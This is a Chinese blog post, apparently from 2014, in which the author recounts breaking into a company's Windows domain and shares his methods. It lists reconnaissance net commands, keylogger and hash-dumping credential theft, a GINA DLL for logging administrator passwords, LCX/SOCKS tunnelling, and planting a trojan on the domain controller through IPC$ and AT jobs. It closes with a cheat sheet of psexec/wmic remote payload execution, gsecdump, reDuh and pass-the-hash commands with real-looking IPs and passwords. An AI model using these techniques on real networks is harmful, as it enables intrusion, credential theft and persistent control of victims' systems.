分享内网渗透域的经验积累

标签: 分享 内网 渗透 | 发表时间:2014-09-09 21:52 | 作者:top5
出处:http://www.iteye.com

本来是在写一份详细的渗透过程,不过因为一直工作,很多细节没有办法当场记录,所以,暂时在BLOG上写一些能想到的,后面如果有时间有环境,会再补充更多的细节以及图片和在渗透时所遇到的麻烦,如何解决等写出来

by Ra1nker 

.ipconfig /all 

//可以查看到当前网卡配置信息,包括所属域以及IP段 

这个命令可以看到:主机名字—shwdm,IP–192.168.103.8,网关IP—192.168.103.10,DNS 域名解析地址IP—192.168.100.1,主WINS服务器IP—10.0.22.5 

2.net view 

//显示正由指定的计算机共享的域、计算机或资源的列表。如果在没有参数的情况下使用,则 net view 显示当前域中的计算机列表。 

可以看到我们当前域共有8台机器,我们的这台机器–SHWDM 也在其中 

3.ping 机器名 

//显示该机器名的IP 

如图PING BJCWSERVER,我们得到这个名字叫BJCWSERVER的主机IP为192.168.103.50 

4.net view /domain 

//查看有多少域 

5.net view /domain:testdomain(testdomain 假设为目标的其中一个域) 

//此命令是查看 testdomain域中的计算机列表 

我们分别查看这三个域中的计算机列表,可以查到MYGROUP域下面只有一台叫NCSERVER的机器,而且系统是LINUX的,是个SAMBA 服务器 

6.net user /domain 

//获取所有域用户列表 

7.net group /domain 

//获取域用户组信息 

8.net group “domain admins” /domain 

//查看与管理组成员 

9.net user domain-admin /domain 

//查看管理员登陆时间,密码过期时间,是否有登陆脚本,组分配等信息! 

10.net time /domain 

//可以查看域时间,以及域服务器的名字(快速查找域的方法之一 By LCX) 

 

总结下,通过这次信息收集,我们可以得到: 

 

1.这个内网的网关为 192.168.103.10,DNS 域名解析IP为192.168.100.1,主WINS服务器为10.0.22.5 

2.一共有三个域,其中WORKGROUP域下面有8台机器(本机亦属其域),POLYCOMRSS 域下面有一台,MYGROUP域下面有一台SAMBA SERVER,系统是LINUX 

1.收集信息。 

1-1.不论什么途径获得的内网机器,确定他在内网后,我们首先就要了解这台机器的所属人员,如果我们的目 标是公司,那我们就要了解这个人在公司里的职位,他是个什么身份,有多大的权利,这都关系到他在内网里的权限。因为,作为大公司,一个高权限的人他在内网 里所要用到的东西就多,那么相对他的机器,当然权限就会比一般普通员工的高很多,这在我的渗透过程中是常见的。 

既然有了他的机器,那么翻翻他的电脑这是必要的,如果你说要怎么翻,你可以尝试熟悉他的电脑甚至比他本人还熟,那你就算了解详细了。一台个人用的电脑,从上面翻出与他自己相关的一些信息,和大量公司信息应该是没有问题的,除非,这是台新电脑。 

1-2.了解了一定的人员信息,期间你要记下你所掌握到的账号,密码这些重要数据,以后有一定的用,所以, 在你渗之前,不妨建个记事本将重要信息保存起来,写个记事本不会浪费你多少时间。接下来,我们就应该对这个网络进行一定的了解,他是一般的内网,还是域? 一般大公司都会用域的,我们只需要查一下就知道,要想对他进行渗透,你就必须了解他的网络拓补,当然,一些太具体的物理上我们是无法了解的,我们只能了解 我们所能知道的。不管他是INT,DMZ,LAN,我们必须足够掌握。在这,我们就会用到一定的命令,相信大家应该都很熟悉。 

ipconfig /all 查询一下本机的一些情况,IP段 网关 属于不属于域 

net view 查询一些存在联系的机器,一般以机器名显示,我们需要对其PING出IP,一是方便查询哪些重要机器的IP,二是方便查询存在几个段 

net view /domain 查询有几个域 因为大型网络里面一般不止一个域的 

net group /domain 查询域里面的组 

net user /domain 查询域用户 

net group “domain admins” /domain 查询域管理用户组 

 

这些都是我们需要了解的,当然有时候还会需要再查询一些信息,NET命令下你们都会找到,不需要我再重复,具体的情况具体分析问题。 

 

2.信息归档 

 

2-1。有了信息,我们就要对信息进行一定的归档,将每个机器名所对应的IP归档,方便用时不会乱。 

2-2。查询出的用户,管理员,我们也必须归档。 

2-3。查询信息时可能出现的有利用价值信息必须归档。 

 

3.技术利用 

 

3-1。不论是通过键盘记录。或者HASH的抓取,我们需要将账号,密码,邮箱,凡是涉及关键数据的全部保存,一方面是准备渗透的资料,二是防止当前利用机器会掉。 

3-1-1。利用远控的键盘记录进行抓取。 

3-1-2。利用PWDUMP7或者GETHASHES进行抓取HASH,然后破解。GETHASHES V1.4后 可以抓取域的全部HASH。 

3-1-3。用GINASTUB.DLL获取管理员的账号和密码。因为域管理员有权限登陆任何一台机器。种上这个只是方便记录他所登陆的密码。INSTALL后,会在SYSYTEM32下生成一个 FAXMODE.INC 文件记录密码。 

3-2。有了内网,很多东西我们是没有必要直接在当前利用机器上操作的,别人虽然是内网,但是不代表他没有防御系统,所以,我们建立SOCKS或者VPN是很有必要的,建立SOCKS相信大家都会了吧。 

3-2-1。我在这推荐 VIDC 这个工具,很方便,在CMD下直接操 VIDC.EXE -D -P PORT 就可以了。 

3-2-2。在利用机器上使用LCX,CMD下 LCX.EXE -SLAVE 服务器IP PORT 127.0.0.1 PORT,然后到服务器上 CMD下 LCX.EXE -LISTEN 服务器IP PORT 任意PORT。 

3-2-3。建立SOCKS后在本地可以用SOCKSCAP来进行连接,成功连接后该操作什么就看你们自己了。 

 

基本上我们就只能操作这么多了,后面已经没有什么技术上的再使用或利用,但是这中间的经验不少,所需要处理的细节也不少。 

我们在得到内网机器后,如果他存在域,但是没有使用域账号怎么办?那我们只能查询或者想尽一切手段获得他常用的账号密码,然后利用这个账号密码,再通过SOCKS进入域。这其中就关系到各位同行查看控制机器的文件,还有记录密码,GINA,HASH破解,这些都是必须的。 

 

进入域后,我们又该怎么做,建立SOCKS后又该怎么做。我们可以扔S上去查看主要的端口,我们可以对端口 进行弱口令的尝试,我们可以针对内网的WEB进行检测,方式很多,甚至你可以用MS08-067对另一台机器进行突破,但是相信我,能使用域的机器,大部 分都是补丁打齐的。我们能利用的很少,但是不能灰心,只要能在内网穿梭,我们至少在防御上会轻松很多,我们需要的只是耐心和时间。 

一旦拥有密码,我们就可以尝试IPC连接,直接拿下域,这就得看你们的权限有多大。 

 

net use \\IP\ipc$ password /user:username@domain 

 

推荐使用这样的方式输入账号和密码,为什么?如果用户名存在空格,你这样输会保险些。什么 域用户不能存在空格? 

是的,以前我也认为不会,微软的讲师也说不会,不过,经过我的测试和经验,那是假的,域 完全可以空格,除了 user name 这样的,还可以存在 user na me ,不信 你可以试试。 

建立IPC后,你只是想COPY文件 或者 RAR文件 再或者种马 那就是你的自由了。 

后话:最近因为在渗域,在渗透过程中,也确实出现一些问题,几次都是不知如何进行,其实在技术上,并没有什么障碍。主要是在于对方有着比较强的主防御,而 我的远控最开始连CMD都无法执行,后经过几天的环境测试,突破了CMD。有了CMD后,进行了查询,获得了一些信息,就开始了往下的渗透,被控机器的密 码我不是跑出来的,我是翻他的文件翻出他常用密码的。因为他没有使用域账号,都是以系统账号登陆,所以无法查看域。我只能用他的域账号建立IPC连接,查 找到内网的一个WEB服务,将其渗透后才算拿下了一个稳定的内网机器。 

拿下内网WEB服务器后,我就已经完全在域内,没有使用HASH INJECTION,我是先查询了DOMAIN ADMINS,发现WEB服务器上的账号就属于这个组,PW后得到了HASH,破解掉我就连向了域控服务器的IPC$。 

 

连接了IPC$,直接在其SYSYTEM32下扔了一个远控,然后用AT命令将其启动,这期间我尝试了5个SHIFT,但是SHIFT关闭后,我的远控也会掉,所以排除了这种方法,还是用AT来ADD NEW JOB 比较方便。 

给域控服务器种了远控,利用CMD来GETHASHES了全部的HASHES进行破解,很幸运的查到了文件管理组的用户,这才有了我后面的目标达成。 

总的来说,我这次的渗透比较运气好,中间麻烦事不是太多,不过也花了半个月的时间,时间大部分花在测试防御环境,软件免杀,木马免杀,查找资料这些上面。 

后来,我获取了他的网络拓补图,发现我所呆的区域只是一个小小的域,还有好几个域我还没有涉及到,在域的前面是DMZ,而DMZ前面当然是INT了。 

已经很晚了,本来是在写一份详细的渗透过程,不过因为一直工作,很多细节没有办法当场记录,所以,暂时在BLOG上写一些能想到的,后面如果有时间有环境,会再补充更多的细节以及图片和在渗透时所遇到的麻烦,如何解决等写出来。 

 

常用命令 

net view 

查看同一域/工作组的计算机列表 

net view /domain 

查看域/工作组列表 

net view /domain:Secwing 

查看Secwing域中 计算机列表 

net group /domain 

查看所在域的组 

net user /domain 

查看所在域用户 

net user /domain zerosoul 12345678 

修改域用户密码,需要域管理员权限,或者Ctrl+Alt+Del点击修改则不需要域管理员权限 

net localgroup administrators SECWING\zerosoul /add 

域Users组用户添加到本地Administrators组,需要本地管理员或域管理员在本机登陆域后进行 

下面的命令 只能用于 域控制器: 

net group “Domain controllers” 

查看域控制器(如果有多台) 

net group 

查看域的组 

net group “domain admins” 

查看域管理员 

net group “domain users” 

查看域管理员 

PS:打开配置域控制器向导的命令 

dcpromo 

psexec /accepteula 绕过第一次验证窗口 

mstsc/admin 解决hash无法抓出问题 

wmic /node:172.16.19.96 /user:ABIMAQ\Administrator /password:k78m90 process call create c:\kav\2009.exe 

psexec.exe -s -u administrator -p k78m90 \\172.16.16.2 -c c:\kav\2009.exe 拷贝文件并且执行 

psexec.exe -s -u administrator -p km3h7i \\172.16.16.2 -c c:\kav\gsecdump.exe -u 抓取hash 

net use \\172.16.16.2\IPC$ “k78m90″ /user:”admintitrator” 

net use \\172.16.16.2\IPC$ “k78m90″ /user:”aABIMAQ\Administrator” 

net time \\172.16.16.2 

at \\172.16.16.2 13:50 2009.exe 

java reDuhClient fdc1.cnhan.com http 80 /admin/reduh.aspx reduh连接命令 

[createTunnel]1234:127.0.0.1:3389 端口转向命令 

iam-alt -h user-hash 这样hash就被注入了 

whosthere-alt.exe 来查看是否被注入成功。



已有 0 人发表留言,猛击->> 这里<<-参与讨论


ITeye推荐



相关 [分享 内网 渗透] 推荐:

分享内网渗透域的经验积累

- - 操作系统 - ITeye博客
本来是在写一份详细的渗透过程,不过因为一直工作,很多细节没有办法当场记录,所以,暂时在BLOG上写一些能想到的,后面如果有时间有环境,会再补充更多的细节以及图片和在渗透时所遇到的麻烦,如何解决等写出来. //可以查看到当前网卡配置信息,包括所属域以及IP段 . 这个命令可以看到:主机名字—shwdm,IP–192.168.103.8,网关IP—192.168.103.10,DNS 域名解析地址IP—192.168.100.1,主WINS服务器IP—10.0.22.5 .

再谈内网渗透

- - FreebuF.COM
前言: 看了@g.r0b1n文章《浅谈内网渗透》抑制不住自己冲动的心情,写一篇《再谈内网渗透》,希望以后有朋友能更新《详谈内网渗透》 在我的脑子里面我始终认为,一次渗透至少要控制被渗透对象80%以上服务器才能算得上一次成功的渗透. 正文: 我没有内网域里面某个机器的权限,我只有一个存在漏洞的web页面,而我的目的就利用这个存在漏洞的web入侵线上服务器,然后从IDC网络入侵到办公网,到了办公网络再入侵域控服务器,很多较大的互联网公司IDC内网与运维网相通的,然而运维内网一般包含在办公网络中.

Putty的噩梦——渗透工具PuttyRider使用心得分享

- - 行业应用 - ITeye博客
近日,我们的360监控平台,检测到一个叫PuttyRider渗透工具,小编立马下回来研究,整理一篇工具的使用心得分享给大家. 我们在入侵到一台主机的时候,经常会看到管理员的桌面会放着putty.exe,这说明有很大的可能性管理员是使用putty远程管理主机的. 该工具主要是针对SSH客户端putty的利用,采用DLL注入的方式,来实现各种猥琐的利用姿势.

渗透测试:内网DNS投毒技术劫持会话

- - FreeBuf.COM
‍本文仅供渗透测试技术学习及教学用途,禁止非法使用‍. 最近一段时间一直在研究内网中嗅探的一些方法,各种方式的尝试,才找到一个比较靠谱的一种方式. 单一的ARP掉线也在10分钟内. 攻击机:Kali 10.10.10.237. 被攻击机: win7 10.10.10.232. 因为只为了测试,只修改了PC1的DNS.

只用一个WiFi,渗透进企业全部内网

- - FreeBuf.COM | 关注黑客与极客
近年来,黑客通过企业无线网络发起的企业内网渗透事件频发,在某漏洞平台检索时发现仅2015年便发生了数十起知名企业因WiFi相关安全问题导致内网被入侵的事件,对企业造成了十分恶劣的影响. 到了2016年,无线网络已经成为企业移动化办公的重要基础设施,但这些无线网络普遍缺乏有效的管理,无线网络也越来越多的成为黑客入侵企业内网的突破口.

现代API渗透技术

- -
API 有多种不同的形式,攻击 API 的方法会因这些形式的不同而有很大差异. 在一篇文章中涵盖所有攻击类型是不可能的,下面我重点介绍其中一部分. 与 Web 应用程序非常相似,API 可以具有不同级别的可见性. 有些可以通过互联网访问,而有些则只能在内部使用. API 攻击方式之一就是简单地访问你应该无法访问的 API.

谷歌应用在Android智能机渗透率高达七成

- xing - cnBeta.COM
据美国科技网站eWeek报道,市场调研公司尼尔森的调查显示,在Android智能机应用中,Facebook、谷歌地图、Gmail和谷歌搜索是最流行的移动应用. 谷歌成功的将大量优势PC桌面应用推广到了智能手机中. 调查显示,在过去30天内,有90%的Android智能机用户从谷歌Android Market商店中下载过应用.

从入门到精通:WiFi渗透哪家强?

- - FreeBuf.COM
‍‍FreeBuf特别提示:本文可能含有攻击性,仅供安全攻防学习和教学用途,禁止非法用途‍‍ ‍. ‍ Wi-Fi安全近年来成为热点话题,“免费WiFi暗藏李鬼”“WiFi钓鱼”事件层出不穷. 了解Wifi渗透知识必不可少,本文为你娓娓道来(附送实战案例). 钓鱼Wi-Fi ,愈来愈多的网友通过公共场所的Wi-Fi来获取资讯,不成想“蹭网”有风险,网上曝出Wi-Fi也能“钓鱼”窃取网银账号、密码等的消息,专家表示通过Wi-Fi进行网络支付网友只要选择来源明确的网络,.

DVWA,推荐一个渗透测试演练系统

- - CSDN博客推荐文章
Web漏洞实战教程(DVWA的使用和漏洞分析)PDF下载:. [TOP10]十大渗透测试演练系统. 作者:lhshaoren 发表于2013-7-7 15:56:43 原文链接. 阅读:17 评论:0 查看评论.

尼尔森:中国智能手机渗透率近2/3

- - 行业资讯
  1月30日消息,根据尼尔森的最新研究发现,截止2012上半年,中国智能手机用户占比所有手机用户的2/3,是在高速增长的金砖四国(巴西,俄罗斯,印度,中国)市场中唯一由智能手机用户占据主导地位的国家.   形成对比的是,在印度和俄罗斯依旧是没有触屏、全键盘和操作系统的功能型手机占据主导地位,分别占比手机用户的80%和51%;在巴西,用户没有很明确的手机喜好类型,功能型手机和智能手机分别占比手机用户的44%和36%,多媒体手机占比手机用户的21%.